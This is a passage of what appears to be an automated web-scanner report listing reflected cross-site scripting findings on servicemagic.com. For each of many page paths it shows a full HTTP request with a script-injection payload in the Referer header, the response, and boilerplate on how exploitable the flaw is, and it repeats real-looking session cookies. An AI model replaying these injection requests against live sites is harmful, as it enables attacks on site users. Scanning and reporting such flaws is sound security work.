Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=48428"><script>alert(1)</script>b7c6712ac0f
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:05 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76deb"><script>alert(1)</script>ab74448bd9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Pittsburgh.PA.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=76deb"><script>alert(1)</script>ab74448bd9b
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:03 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d831f"><script>alert(1)</script>97ea906f3f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Raleigh.NC.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=d831f"><script>alert(1)</script>97ea906f3f5
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:04 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a096"><script>alert(1)</script>1f1454eda87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.San_Francisco.CA.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=6a096"><script>alert(1)</script>1f1454eda87
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:02 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: ca
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19470"><script>alert(1)</script>24ac96593ca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Washington.DC.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=19470"><script>alert(1)</script>24ac96593ca
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:07 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f577c"><script>alert(1)</script>e4fea1fb02e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=f577c"><script>alert(1)</script>e4fea1fb02e
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:16:30 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- /rfs/servicerequest/exactmatch/SMDirHome.jsp -->
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cfc"><script>alert(1)</script>bea7feb4501 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /clp/ HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=53cfc"><script>alert(1)</script>bea7feb4501
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:04 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd579"><script>alert(1)</script>0a7465b1491 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /commercial HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=dd579"><script>alert(1)</script>0a7465b1491
Response (redirected)
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:00 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f17f"><script>alert(1)</script>ba8ba145129 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /electricians/ HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=6f17f"><script>alert(1)</script>ba8ba145129
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:25 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- /electricians/index.jsp -->
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
<input type="hidden" name="referringUrl" value="http://www.google.com/search?hl=en&q=6f17f"><script>alert(1)</script>ba8ba145129"/>
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea62"><script>alert(1)</script>8041b654483 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ext/400678 HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=aea62"><script>alert(1)</script>8041b654483
Response (redirected)
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:19:08 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84c65"><script>alert(1)</script>fa21734f17d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home-improvement-projects/ HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=84c65"><script>alert(1)</script>fa21734f17d
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:40 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5079c"><script>alert(1)</script>638edebde70 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hs-sitemap/sitemap.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=5079c"><script>alert(1)</script>638edebde70
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:48 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- /home-improvement-site-map/hsSiteMap.jsp -->
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d743"><script>alert(1)</script>11ee823d331 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /kitchen-remodeling/ HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=7d743"><script>alert(1)</script>11ee823d331
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:28 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- /kitchen-remodeling/index.jsp -->
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd89'-alert(1)-'975465dc26c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labs/cxp/ HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=9cd89'-alert(1)-'975465dc26c
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:15:51 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 315b6"><script>alert(1)</script>5391b11f7d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /plumbers/ HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=315b6"><script>alert(1)</script>5391b11f7d6
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:20 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- /plumbers/index.jsp -->
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd0d"><script>alert(1)</script>b48dfabe5c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.Senior-Care.94.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=8bd0d"><script>alert(1)</script>b48dfabe5c3
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:17:57 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39955"><script>alert(1)</script>20654db5c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.design-gallery.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
